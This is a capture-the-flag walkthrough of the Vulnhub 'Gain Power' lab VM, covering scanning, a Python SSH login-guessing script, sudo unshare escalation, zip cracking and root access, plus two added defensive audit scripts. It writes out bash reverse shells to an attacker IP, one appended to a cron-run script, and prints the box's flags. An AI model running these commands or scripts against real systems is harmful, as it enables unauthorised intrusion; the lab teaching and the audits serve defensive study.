Vulnhub Gain Power VM: detailed test walkthrough


Gain Power

Identify the target host's IP address
    (kali㉿kali)-[~/Vulnhub/Gainpower]
    └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
    Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts
    3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
    _____________________________________________________________________________
       IP            At MAC Address     Count     Len  MAC Vendor / Hostname
    -----------------------------------------------------------------------------
    192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor
    192.168.56.100  08:00:27:a1:99:30      1      60  PCS Systemtechnik GmbH
    192.168.56.254  08:00:27:57:a3:c2      1      60  PCS Systemtechnik GmbH
Using the netdiscover tool in Kali Linux, the target host's IP address is identified as 192.168.56.254.
NMAP scan
    ┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
    └─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-01 09:14 EDT
    Nmap scan report for bogon (192.168.56.254)
    Host is up (0.00015s latency).
    Not shown: 65532 closed tcp ports (reset)
    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
    | ssh-hostkey:
    |   2048 88416111e11f187dd60c38292579162c (RSA)
    |   256 18c5fdcecd2b92f8d9171721249d67df (ECDSA)
    |_  256 84c514e4e93321416a9272b9a7331aea (ED25519)
    80/tcp   open  http    Apache httpd 2.4.6 ((CentOS))
    |_http-title: Watch shop | eCommers
    | http-methods:
    |_  Potentially risky methods: TRACE
    |_http-server-header: Apache/2.4.6 (CentOS)
    8000/tcp open  http    Ajenti http control panel
    |_http-title: Ajenti
    MAC Address: 08:00:27:57:A3:C2 (Oracle VirtualBox virtual NIC)
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 9.86 seconds
The NMAP scan shows the target host has 3 open ports: 22 (ssh), 80 (http) and 8000 (http).
Getting a shell
    ┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
    └─$ nikto -h http://192.168.56.254/
    - Nikto v2.1.6
    ---------------------------------------------------------------------------
    + Target IP:          192.168.56.254
    + Target Hostname:    192.168.56.254
    + Target Port:        80
    + Start Time:         2023-05-01 09:17:44 (GMT-4)
    ---------------------------------------------------------------------------
    + Server: Apache/2.4.6 (CentOS)
    + The anti-clickjacking X-Frame-Options header is not present.
    + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
    + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
    + Apache/2.4.6 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
    + Allowed HTTP Methods: POST, OPTIONS, GET, HEAD, TRACE
    + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
    + OSVDB-3092: /readme.txt: This might be interesting...
    + OSVDB-3268: /secret/: Directory indexing found.
    + OSVDB-3092: /secret/: This might be interesting...
    + OSVDB-3268: /icons/: Directory indexing found.
    + OSVDB-3233: /icons/README: Apache default file found.
    + /login.html: Admin login page/section found.
    + OSVDB-3092: /test.php: This might be interesting...
    + 8725 requests: 0 error(s) and 13 item(s) reported on remote host
    + End Time:           2023-05-01 09:18:38 (GMT-4) (54 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested
The nikto scan found the directory /secret. Visiting it, the image files in that directory were downloaded to the local Kali Linux box for analysis, but the image analysis did not yield any meaningful result.
    └─$ ssh root@192.168.56.254
    The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
    ED25519 key fingerprint is SHA256:1yR5iTL+oNBeYI7ACvh1p8CYWHrzXAiOC+CSijIO9uQ.
    This key is not known by any other names.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
    Hi !!! THIS MESSAGE IS ONLY VISIBLE IN OUR NETWORK :)
       ___      _        ___
      / __|__ _(_)_ _   | _ \_____ __ _____ _ _
    | (_ / _` | | ' \  |  _/ _ \ V  V / -_) '_|
      \___\__,_|_|_||_| |_| \___/\_/\_/\___|_|
    I HOPE EVERYONE KNOW THE JOINING ID CAUSE THAT IS YOUR USERNAME : ie : employee1 employee2 ... ... ... so on ;)
    I already told the format of password of everyone in the yesterday's metting.
    Now i have configured everything. My request is to everyone to Complete assignments on time
    btw one of my employee have sudo powers because he is my favourite
    NOTE : "This message will automatically removed after 2 days"
                                                                    - BOSS
    root@192.168.56.254's password:
Assume the username is employee1. Going by the author's hint, the password probably follows a pattern tied to the username, such as being identical to it.
The home directory shows the users coworker, helper and the employee accounts, and only one of the employees has sudo rights, so we need to write a script to find out which employee that is.
    import paramiko
    import sys
    import time


    class GainPowerCls:
        def __init__(self) -> None:
            self.host = '192.168.56.254'   # IP address of the target virtual machine
            print("Target: %s" % self.host)
            try:
                self.ssh_client = paramiko.SSHClient()
                # Lab box: accept the unknown host key automatically
                self.ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            except Exception as e:
                print("Something is wrong: %s" % e)
                sys.exit(1)

        def run_sudo(self, username, password):
            try:
                print('Attempt to access by %s: %s' % (username, password))
                self.ssh_client.connect(hostname=self.host, username=username,
                                        password=password, timeout=10)
                # The underlying Transport lets us open a raw "session" channel
                transport = self.ssh_client.get_transport()
                session = transport.open_session()
                # Merge stderr into stdout so the sudo prompt and the rule list arrive together
                session.set_combine_stderr(True)
                # sudo only prompts for a password on a tty, so request a pty before exec
                session.get_pty()
                session.exec_command('sudo -l')
                stdin = session.makefile('wb', -1)
                stdout = session.makefile('rb', -1)
                # Answer the "[sudo] password for ..." prompt
                stdin.write(password + '\n')
                stdin.flush()
                print(stdout.read().decode('utf-8', errors='replace'))
                session.close()
            except paramiko.AuthenticationException:
                # Wrong password for this account: carry on with the next one
                print('Authentication failed for %s' % username)
            except Exception as e:
                print(e)
            finally:
                # Safe to call even when connect() failed; the next connect() opens a new transport
                self.ssh_client.close()

        def run(self):
            for i in range(1, 101):
                username = 'employee' + str(i)
                password = 'employee' + str(i)   # assumption from the banner: password == username
                self.run_sudo(username, password)
                print('*' * 150)
                time.sleep(1)


    if __name__ == '__main__':
        client = GainPowerCls()
        client.run()
Running the Python script above shows that employee64 has sudo rights.
    employee64
    [sudo] password for employee64:
    Matching Defaults entries for employee64 on localhost:
        !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
        env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
        env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
        env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
        env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
        env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
        secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
    User employee64 may run the following commands on localhost:
        (programmer) /usr/bin/unshare
    ******************************************************************************************************************************************************
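As an added example, not part of the original write-up: the Python below parses sudo -l output of the kind shown above and flags rules that let one account obtain a shell as another, which is the misconfiguration this box turns on (the "(programmer) /usr/bin/unshare" rule). The sample text is copied from the output above; the SHELL_CAPABLE starter list and the parse_sudo_l/risky_rules function names are assumptions made for this example.

```python
import re

# Binaries that let whoever may sudo them run arbitrary commands as the
# target user. unshare is the one used on this box; the rest are plain shells.
# Hypothetical starter list for the example; extend it for your own environment.
SHELL_CAPABLE = {"unshare", "bash", "sh", "dash", "zsh", "su"}

# One rule line from the "may run the following commands" section, e.g.
#   (programmer) /usr/bin/unshare
#   (root) NOPASSWD: /usr/bin/systemctl restart httpd, /bin/ls
RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")

# Constructed copy of the sudo -l output shown on the page for employee64.
SAMPLE_SUDO_L = """Matching Defaults entries for employee64 on localhost:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
    secure_path=/sbin\\:/bin\\:/usr/sbin\\:/usr/bin
User employee64 may run the following commands on localhost:
    (programmer) /usr/bin/unshare
"""


def parse_sudo_l(output):
    """Turn the rules section of `sudo -l` output into a list of dicts with
    the run-as user, whether NOPASSWD applies, and each individual command."""
    rules = []
    in_rules = False
    for line in output.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE.match(line)
        if not m:
            continue
        # "(user : group)" -> keep only the user part
        runas = m.group("runas").split(":")[0].strip()
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        for cmd in m.group("cmd").split(", "):
            rules.append({"runas": runas, "nopasswd": "NOPASSWD" in tags, "command": cmd.strip()})
    return rules


def risky_rules(rules):
    """Rules that hand out a shell as another user: ALL, or a shell-capable binary."""
    out = []
    for r in rules:
        cmd = r["command"]
        if cmd == "ALL":
            out.append(r)
            continue
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if binary in SHELL_CAPABLE:
            out.append(r)
    return out


if __name__ == "__main__":
    for r in risky_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print("employee64 may become %s via %s%s" % (
            r["runas"], r["command"], " without a password" if r["nopasswd"] else ""))
```

Run it against the output of sudo -l for each account you audit (or over the whole sudoers file after expanding aliases); a rule that grants a namespace or shell binary as another user is equivalent to granting that user's shell outright, and the NOPASSWD flag tells you whether a stolen session alone is enough.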
    ┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
    └─$ ssh employee64@192.168.56.254
    Hi !!! THIS MESSAGE IS ONLY VISIBLE IN OUR NETWORK :)
       ___      _        ___
      / __|__ _(_)_ _   | _ \_____ __ _____ _ _
    | (_ / _` | | ' \  |  _/ _ \ V  V / -_) '_|
      \___\__,_|_|_||_| |_| \___/\_/\_/\___|_|
    I HOPE EVERYONE KNOW THE JOINING ID CAUSE THAT IS YOUR USERNAME : ie : employee1 employee2 ... ... ... so on ;)
    I already told the format of password of everyone in the yesterday's metting.
    Now i have configured everything. My request is to everyone to Complete assignments on time
    btw one of my employee have sudo powers because he is my favourite
    NOTE : "This message will automatically removed after 2 days"
                                                                    - BOSS
    employee64@192.168.56.254's password:
    Permission denied, please try again.
    employee64@192.168.56.254's password:
    Last failed login: Mon May  1 22:34:48 EDT 2023 from 192.168.56.206 on ssh:notty
    There was 1 failed login attempt since the last successful login.
    Last login: Mon May  1 22:30:52 2023 from 192.168.56.206
    [employee64@localhost ~]$ id
    uid=1063(employee64) gid=1063(employee64) groups=1063(employee64) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
Running bash in a separate namespace via unshare gives us a shell as programmer.
    [employee64@localhost ~]$ sudo -u programmer /usr/bin/unshare /bin/bash
    [sudo] password for employee64:
    bash-4.2$ id
    uid=1182(programmer) gid=1184(prome) groups=1184(prome) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
    bash-4.2$
This gives us a shell as programmer.
    bash-4.2$ pwd
    /media/programmer/scripts
    bash-4.2$ cat backup.sh
    #!/bin/bash
    cp /var/www/html/thisiscarddetails.txt /tmp/back.txt
There is a script in /media/programmer/scripts that is run periodically.
Upload the pspy64 tool to the /tmp directory on the target host.
    bash-4.2$ cd /tmp
    bash-4.2$ wget http://192.168.56.206:8000/pspy64
    --2023-05-01 22:42:29--  http://192.168.56.206:8000/pspy64
    Connecting to 192.168.56.206:8000... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 3104768 (3.0M) [application/octet-stream]
    Saving to: ‘pspy64’
    100%[====================================================================================>] 3,104,768   --.-K/s   in 0.01s
    2023-05-01 22:42:29 (235 MB/s) - ‘pspy64’ saved [3104768/3104768]
    bash-4.2$ chmod +x pspy64

    2023/05/01 22:44:01 CMD: UID=1183  PID=25118  | /bin/bash /media/programmer/scripts/backup.sh
This shows that backup.sh is executed periodically by the user with UID 1183.
Checking /etc/passwd shows that UID 1183 belongs to the user vanshal.
    bash-4.2$ ls -alh
    total 4.0K
    drwxr-xr-x. 2 programmer prome 23 May 18  2020 .
    drwxrwx---. 3 programmer prome 21 Aug  8  2019 ..
    -rwxr-xr-x. 1 programmer prome 65 May 18  2020 backup.sh
The programmer user has write permission on the backup.sh script.
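Added example, not from the original post: a small audit in Python that takes pspy-style lines like the one above, works out which script each scheduled command runs, and reports it when a user other than the one executing it could change the file. That is exactly the backup.sh situation here (owned and writable by programmer, executed as vanshal). The temporary files, uids and log lines built in demo() are constructed for the example, and the function names are my own.

```python
import os
import re
import stat
import tempfile

# Matches pspy's process lines, e.g.
#   2023/05/01 22:44:01 CMD: UID=1183  PID=25118  | /bin/bash /media/programmer/scripts/backup.sh
PSPY_CMD = re.compile(r"CMD: UID=(?P<uid>\d+)\s+PID=(?P<pid>\d+)\s+\|\s+(?P<cmd>.+?)\s*$")

INTERPRETERS = {"bash", "sh", "dash", "python", "python3", "perl"}


def script_path(cmdline):
    """Return the file a command line executes: the first non-option argument
    after a known interpreter, otherwise the program itself."""
    parts = cmdline.split()
    if not parts:
        return None
    if os.path.basename(parts[0]) in INTERPRETERS:
        for arg in parts[1:]:
            if not arg.startswith("-"):
                return arg
        return None
    return parts[0]


def audit_scheduled_scripts(pspy_lines):
    """For every script pspy saw running, report it when someone other than the
    executing uid (or root) could change its contents.
    Returns a list of (path, executing_uid, reasons) tuples."""
    findings = []
    for line in pspy_lines:
        m = PSPY_CMD.search(line)
        if not m:
            continue
        path = script_path(m.group("cmd"))
        if not path or not os.path.isfile(path):
            continue
        st = os.stat(path)
        run_uid = int(m.group("uid"))
        reasons = []
        # A script owned by a third, less privileged account is the case on this box
        if st.st_uid not in (0, run_uid):
            reasons.append("owned by uid %d but executed as uid %d" % (st.st_uid, run_uid))
        if st.st_mode & stat.S_IWGRP:
            reasons.append("group-writable")
        if st.st_mode & stat.S_IWOTH:
            reasons.append("world-writable")
        if reasons:
            findings.append((path, run_uid, reasons))
    return findings


def demo():
    """Constructed scenario: backup.sh is owned by the current user but run by
    another uid (like programmer vs vanshal on the box) and is group-writable;
    own.sh is run by its owner with a sane mode. Only backup.sh is reported."""
    workdir = tempfile.mkdtemp()
    me = os.getuid()
    backup = os.path.join(workdir, "backup.sh")
    with open(backup, "w") as f:
        f.write("#!/bin/bash\ncp /var/www/html/thisiscarddetails.txt /tmp/back.txt\n")
    os.chmod(backup, 0o775)
    own = os.path.join(workdir, "own.sh")
    with open(own, "w") as f:
        f.write("#!/bin/bash\necho ok\n")
    os.chmod(own, 0o755)
    other_uid = me + 1   # constructed: some other account's uid
    lines = [  # constructed pspy output
        "2023/05/01 22:44:01 CMD: UID=%d  PID=25118  | /bin/bash %s" % (other_uid, backup),
        "2023/05/01 22:45:01 CMD: UID=%d  PID=25119  | /bin/bash %s" % (me, own),
        "2023/05/01 22:45:02 CMD: UID=0     PID=25120  | /usr/sbin/crond -n",
    ]
    return audit_scheduled_scripts(lines)


if __name__ == "__main__":
    for path, uid, reasons in demo():
        print("%s (run as uid %d): %s" % (path, uid, "; ".join(reasons)))
```

Feed it a real pspy capture (or the command lines from crontabs and systemd timers) as a periodic host check. The owner test catches the page's case; the group- and world-writable tests catch the other common way a low-privilege account ends up editing something another user's cron job runs. The parent directory's permissions deserve the same check, since a writable directory lets the whole file be replaced.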
    bash-4.2$ echo 'bash -i >& /dev/tcp/192.168.56.206/5555 0>&1' >> backup.sh
    ──(kali㉿kali)-[~/Vulnhub/Gainpower]
    └─$ sudo nc -nlvp 5555
    [sudo] password for kali:
    listening on [any] 5555 ...
    connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 51130
    bash: no job control in this shell
    [vanshal@localhost ~]$ id
    id
    uid=1183(vanshal) gid=1184(prome) groups=1184(prome) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
    You have mail in /var/mail/vanshal
After a short wait, we get a shell as vanshal.
    [vanshal@localhost ~]$ cat loc
    cat local.txt
                    ░██████╗░░█████╗░██╗███╗░░██╗  ██████╗░░█████╗░░██╗░░░░░░░██╗███████╗██████╗░
                    ██╔════╝░██╔══██╗██║████╗░██║  ██╔══██╗██╔══██╗░██║░░██╗░░██║██╔════╝██╔══██╗
                    ██║░░██╗░███████║██║██╔██╗██║  ██████╔╝██║░░██║░╚██╗████╗██╔╝█████╗░░██████╔╝
                    ██║░░╚██╗██╔══██║██║██║╚████║  ██╔═══╝░██║░░██║░░████╔═████║░██╔══╝░░██╔══██╗
                    ╚██████╔╝██║░░██║██║██║░╚███║  ██║░░░░░╚█████╔╝░░╚██╔╝░╚██╔╝░███████╗██║░░██║
                    ░╚═════╝░╚═╝░░╚═╝╚═╝╚═╝░░╚══╝  ╚═╝░░░░░░╚════╝░░░░╚═╝░░░╚═╝░░╚══════╝╚═╝░░╚═╝
                       You successfully owned the user of this box :-) Best of Luck for the root
    flag: 5c2a29d7b95868da9e503502f301e8dd
    Twitter : VanshalG
We have the user flag.
The home directory contains the file secret.zip; download it to the local Kali Linux box.
    ──(kali㉿kali)-[~/Vulnhub/Gainpower]
    └─$ wget http://192.168.56.254:9999/secret.zip
    --2023-05-01 22:52:19--  http://192.168.56.254:9999/secret.zip
    Connecting to 192.168.56.254:9999... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 439 [application/zip]
    Saving to: ‘secret.zip’
    secret.zip                      100%[=====================================================>]     439  --.-KB/s    in 0s
    2023-05-01 22:52:19 (1.52 MB/s) - ‘secret.zip’ saved [439/439]
    ──(kali㉿kali)-[~/Vulnhub/Gainpower]
    └─$ unzip secret.zip
    Archive:  secret.zip
    [secret.zip] Mypasswords.txt password:
    ┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
    └─$ zip2john secret.zip > secret_hash
    ver 2.0 efh 5455 efh 7875 secret.zip/Mypasswords.txt PKZIP Encr: TS_chk, cmplen=243, decmplen=257, crc=BC7A971B ts=7F46 cs=7f46 type=8
    ┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
    └─$ john --wordlist=/usr/share/wordlists/rockyou.txt secret_hash
    Using default input encoding: UTF-8
    Loaded 1 password hash (PKZIP [32/64])
    Will run 2 OpenMP threads
    Press 'q' or Ctrl-C to abort, almost any other key for status
    81237900         (secret.zip/Mypasswords.txt)
    1g 0:00:00:00 DONE (2023-05-01 22:53) 6.250g/s 4480Kp/s 4480Kc/s 4480KC/s AnThOnY..741210
    Use the "--show" option to display all of the cracked passwords reliably
    Session completed.
Cracking gives us the password of the archive.
    ┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
    └─$ unzip secret.zip
    Archive:  secret.zip
    [secret.zip] Mypasswords.txt password:
      inflating: Mypasswords.txt
    ┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
    └─$ cat Mypasswords.txt
    aTQ!vYxQUh3$&uaN3p%@_ax#Ab2XNZ!5$rFh$@bDMyxt#&Q2L&4+DvDT?A!MPKK9sFq-V8_d$5gQLKyKhf-4&S=_m^Cx?bZYf8Bv%%*H^GcvDc4ayfPk^HWs8bnD%Ayk3$5WP6_K?a6_%MF&e-DS2ZZ$m93BL3CY!huQDM2-JZcMSMKT8K*Z7zLPGATU7JP&x#JtaZHAbM^%$TK%C3ubXV4#e87M6P-puXTTMbzuP5y4qX6Uzd%ed8Ux_vMX=pCB
With the password above we can log in to the service on port 8000 as user root.
It has a webshell that can run any command.
    bash -i >& /dev/tcp/192.168.56.206/8888 0>&1
    ┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
    └─$ sudo nc -nlvp 8888
    [sudo] password for kali:
    listening on [any] 8888 ...
    connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 45550
    [root@localhost /]# id
    id
    uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
    [root@localhost /]# cd /root
    cd /root
    [root@localhost root]# ls -alh
    ls -alh
    total 28K
    dr-xr-x---.  3 root root  132 Jun 21  2020 .
    dr-xr-xr-x. 18 root root  240 Aug  7  2019 ..
    -rw-r--r--.  1 root root   18 Dec 28  2013 .bash_logout
    -rw-r--r--.  1 root root  176 Dec 28  2013 .bash_profile
    -rw-r--r--.  1 root root  176 Dec 28  2013 .bashrc
    -rw-r--r--.  1 root root  100 Dec 28  2013 .cshrc
    drwxr-----.  3 root root   19 Aug  7  2019 .pki
    -rw-r--r--.  1 root root 2.1K May 18  2020 proof.txt
    -rw-------.  1 root root 1.0K Aug  7  2019 .rnd
    -rw-r--r--.  1 root root  129 Dec 28  2013 .tcshrc
    [root@localhost root]# cat proof.txt
    cat proof.txt
            ░██████╗░░█████╗░██╗███╗░░██╗  ██████╗░░█████╗░░██╗░░░░░░░██╗███████╗██████╗░
            ██╔════╝░██╔══██╗██║████╗░██║  ██╔══██╗██╔══██╗░██║░░██╗░░██║██╔════╝██╔══██╗
            ██║░░██╗░███████║██║██╔██╗██║  ██████╔╝██║░░██║░╚██╗████╗██╔╝█████╗░░██████╔╝
            ██║░░╚██╗██╔══██║██║██║╚████║  ██╔═══╝░██║░░██║░░████╔═████║░██╔══╝░░██╔══██╗
            ╚██████╔╝██║░░██║██║██║░╚███║  ██║░░░░░╚█████╔╝░░╚██╔╝░╚██╔╝░███████╗██║░░██║
            ░╚═════╝░╚═╝░░╚═╝╚═╝╚═╝░░╚══╝  ╚═╝░░░░░░╚════╝░░░░╚═╝░░░╚═╝░░╚══════╝╚═╝░░╚═╝
    _________                                     __        .__          __  .__
    \_   ___ \  ____   ____    ________________ _/  |_ __ __|  | _____ _/  |_|__| ____   ____
    /    \  \/ /  _ \ /    \  / ___\_  __ \__  \\   __\  |  \  | \__  \\   __\  |/  _ \ /    \
    \     \___(  <_> )   |  \/ /_/  >  | \// __ \|  | |  |  /  |__/ __ \|  | |  (  <_> )   |  \
    \______  /\____/|___|  /\___  /|__|  (____  /__| |____/|____(____  /__| |__|\____/|___|  /
            \/            \//_____/            \/                     \/                    \/
    You successfully owned the root of this box :-)
    Flag: eb2e174c3883ff6b5fd871167795b4d6
    Twitter : VanshalG
    [root@localhost root]#